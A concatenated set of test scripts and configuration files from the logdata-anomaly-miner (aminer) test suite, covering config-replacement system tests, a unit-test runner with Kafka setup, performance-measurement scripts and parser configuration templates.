> $OUT CMD1=$(sed -n '2p' < $OUT) $CMD1 # Replace the Analysis config and compare the output. (14.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 8, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null sudo rm -r /var/lib/aminer/NewMatchPathValueDetector/accesslog_status 2> /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 14." exit_code=$((exit_code | $?)) echo "$(awk '/^{$/ && ++n == 2, /^}$/' < $OUT)" > $OUT # remove NewMatchPathDetector output. IN1=$(sed -n '1,22p' < $OUT) IN2=$(sed -n '24,26p' < $OUT) awk '/^```$/ && ++n == 27, /^```$/ && n++ == 28' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(sed -n '1,22p' < $OUT) OUT2=$(sed -n '24,26p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 14." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 14." exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (15.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 10, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 15." exit_code=$((exit_code | $?)) # skipping this check, because it has to change the log resources. #IN1=$(cat $OUT) #awk '/^```$/ && ++n == 39, /^```$/ && n++ == 40' < $INPUT_FILE | sed '/^```/ d' > $OUT #OUT1=$(cat $OUT) #compareStrings "$OUT1" "$IN1" "Failed Test in 15." #exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (16.) ANALYSIS_PREFIX='Analysis: ' CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 11, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$ANALYSIS_PREFIX$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 16." exit_code=$((exit_code | $?)) # skipping this check, because not all log lines were used in this test, so the output can not be reproduced. #IN1=$(sed -n '113,148p' < $OUT) #awk '/^```$/ && ++n == 46, /^```$/ && n++ == 47' < $INPUT_FILE | sed '/^```/ d' > $OUT #OUT1=$(cat $OUT) #compareStrings "$OUT1" "$IN1" "Failed Test in 16." #exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (17.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 12, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 17." exit_code=$((exit_code | $?)) # Replace the Parser config. (18.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 14, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 18." exit_code=$((exit_code | $?)) # Replace the Parser config. (19.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 17, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (20.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 18, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Parser config. (21.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 20, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (22.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 21, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Parser config. (23.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 23, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (24.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 24, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Run the final configuration. (25.) awk '/^```yaml$/ && ++n == 26, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 25." exit_code=$((exit_code | $?)) rm $OUT rm $LOG1 rm $LOG2 sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runUnittests.sh000077500000000000000000000040341437606560100240740ustar00rootroot00000000000000source config sudo cp unit/data/kafka-client.conf /etc/aminer/kafka-client.conf sudo cp unit/data/configfiles/Sub* /etc/aminer/conf-enabled/ curl $KAFKA_URL --output kafka.tgz tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 1 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & exit_code=0 sudo python3 -bb -m unittest discover -s unit/analysis -p '*Test.py' > /dev/null & ANALYSIS_PID=$! sudo python3 -bb -m unittest discover -s unit/events -p '*Test.py' > /dev/null & EVENTS_PID=$! sudo python3 -bb -m unittest discover -s unit/input -p '*Test.py' > /dev/null & INPUT_PID=$! sudo python3 -bb -m unittest discover -s unit/parsing -p '*Test.py' > /dev/null & PARSING_PID=$! sudo python3 -bb -m unittest discover -s unit/util -p '*Test.py' > /dev/null & UTIL_PID=$! sudo python3 -bb -m unittest discover -s unit/data -p '*Test.py' > /dev/null & DATA_PID=$! wait $ANALYSIS_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Analysis unittests." fi wait $PARSING_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Parsing unittests." fi wait $UTIL_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Util unittests." fi wait $INPUT_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Input unittests." fi wait $EVENTS_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Events unittests." fi wait $DATA_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Data unittests." fi test -e /var/mail/mail && sudo rm -f /var/mail/mail sudo rm /tmp/test4unixSocket.sock sudo rm /tmp/test5unixSocket.sock sudo rm /tmp/test6unixSocket.sock sudo rm -r /tmp/lib/aminer/* $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs sudo rm /etc/aminer/kafka-client.conf sudo rm etc/aminer/conf-enabled/Sub* exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/system/000077500000000000000000000000001437606560100223315ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/000077500000000000000000000000001437606560100257725ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/aminerSystemPerformanceTest.sh000077500000000000000000000046411437606560100340400ustar00rootroot00000000000000#!/bin/bash #This script should be used to test the performance of the aminer in different hardware setups or virtual machines with different ressources. MACHINE_NAME="Acer Aspire 5750g" CPU_NAME="i7-2630QM" CPU_Number="0.1" RAM_Used="32MB" Persistent_Memory_Type="SSD" AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* t=`date +%d.%m.%Y_%H-%M-%S` RESULTS_DIR=/tmp/results_$t RESULTS_PATH=/tmp/results.csv LOGFILE=/tmp/syslog sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm -r $RESULTS_PATH 2> /dev/null mkdir $RESULTS_DIR FILE=/tmp/performance-config.py if ! test -f "$FILE"; then echo "$FILE does not exist!" exit fi if [[ $# -lt 2 ]]; then echo "Error, not enough parameters found!" echo "Please run the script with a parameter for the runtime in seconds and a parameter for the description." echo "For example: ./aminerSystemPerformanceTest.sh 900 \"Low performance test with many outputs. (./multiplyLogFile.sh 400000 syslog_low_performance_many_outputs-template /tmp/syslog)\"" exit fi before=`date +%s` waitingTime=$1 description=$2 endTime=$(($before+$waitingTime)) echo "" echo "calculating the MD5 sum of the logfile.." MD5=`md5sum $LOGFILE | awk '{ print $1 }'` #MD5="" echo "counting the lines of the logfile.." LINE_NUMBER=`wc -l < $LOGFILE | tr -d "\n"` #LINE_NUMBER="" python3 -c "import psutil" if [ $? -gt 0 ]; then sudo pip3 install psutil fi echo "Performance test started.." echo "" python3 generateSystemLogdata.py $((waitingTime+10)) 2> /tmp/error.log & #start aminer sudo -H -u aminer bash -c 'aminer --config '$FILE' & #2> /dev/null & #> /tmp/output &' sleep $waitingTime touch $RESULTS_PATH sudo chown -R aminer:aminer $RESULTS_PATH #stop aminer and python3 sleep 3 & wait $! sudo pkill -x aminer KILL_PID=$! sleep 3 wait $KILL_PID sudo chown -R $USER:$USER $RESULTS_PATH 2> /dev/null printf " in $waitingTime seconds.\nThe source file contains $LINE_NUMBER log lines.\n\nmachine name, CPU name, #CPUs used, RAM used, persistent memory type\n$MACHINE_NAME, $CPU_NAME, $CPU_Number, $RAM_Used, $Persistent_Memory_Type\n\nConfig File,config_$t.py\nMD5-Hash Logfile,$MD5\nTest description,$description\n\n" >> $RESULTS_PATH mv $RESULTS_PATH $RESULTS_DIR cp $FILE $RESULTS_DIR/config_$t.py echo "" echo "Performance test finished!" logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/generateSystemLogdata.py000066400000000000000000000034051437606560100326410ustar00rootroot00000000000000# This file can be used to test the VariableTypeDetector. It provides discrete # and continuous data measured from the running system. import psutil import time import sys from datetime import datetime import multiprocessing with open('/tmp/results.csv', 'a+', buffering=100) as file: # skipcq: BAN-B108 string = '' string += 'time,aminerCpuUsage,aminerMemUsage,' for i in range(multiprocessing.cpu_count()): string += "cpu%d," % (i+1) string += 'vmTotal,vmAvailable,vmPercent,vmUsed,vmFree\n' startTime = time.time() endTime = startTime + int(sys.argv[1]) p = None ppid = None firstRead = False while time.time() < endTime: t = time.time() for proc in psutil.process_iter(): if psutil.pid_exists(proc.pid) and proc.name() == "aminer": pid = proc.pid if p is None or pid > ppid: ppid = pid p = psutil.Process(ppid) firstRead = True if psutil.pid_exists(ppid): aminerCpu = str(p.cpu_percent(interval=0.0)) mem = "%.2f" % p.memory_percent() else: aminerCpu = '-' mem = '-' cpus = psutil.cpu_percent(percpu=True) dt = datetime.fromtimestamp(time.time()).strftime("%Y-%m-%d %H:%M:%S") vm = psutil.virtual_memory() cpu = "" for i in range(multiprocessing.cpu_count()): cpu = cpu + str(cpus[i]) + ',' if firstRead is True: firstRead = False else: string += "%s,%s,%s,%s%s,%s,%s,%s,%s\n" % (dt, aminerCpu, mem, cpu, vm[0], vm[1], vm[2], vm[3], vm[4]) delta = time.time()-t if delta < 1: time.sleep(1-delta) file.write(string) file.close() logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/multiplyLogFile.sh000077500000000000000000000010641437606560100314530ustar00rootroot00000000000000if [[ $# -lt 3 ]]; then echo "Error, not enough parameters found!" echo "Please run the script as follows: ./multiplyLogFile.sh numberOfCopies templateFile targetFile" echo "For example: ./multiplyLogFile.sh 2700000 syslog-template /tmp/syslog" exit fi iterations=$1 src=$2 target=$3 sudo rm $target 2> /dev/null # read the sourcefile into an array. mapfile -t srcArray < $src i=0 while [ $i -lt $iterations ]; do if [ $i -eq 0 ]; then printf "%s\n" "${srcArray[@]}" > $target else printf "%s\n" "${srcArray[@]}" >> $target fi i=$((i + 1)) done logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/performance-config.py000066400000000000000000000140631437606560100321140ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement parsing_model = AnyByteDataModelElement('AnyByteDataModelElement') # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [atom_filter], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector( analysis_context.aminer_config, ['/AnyByteDataModelElement'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/performance-config1.py000066400000000000000000000436151437606560100322020ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Start Time', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) 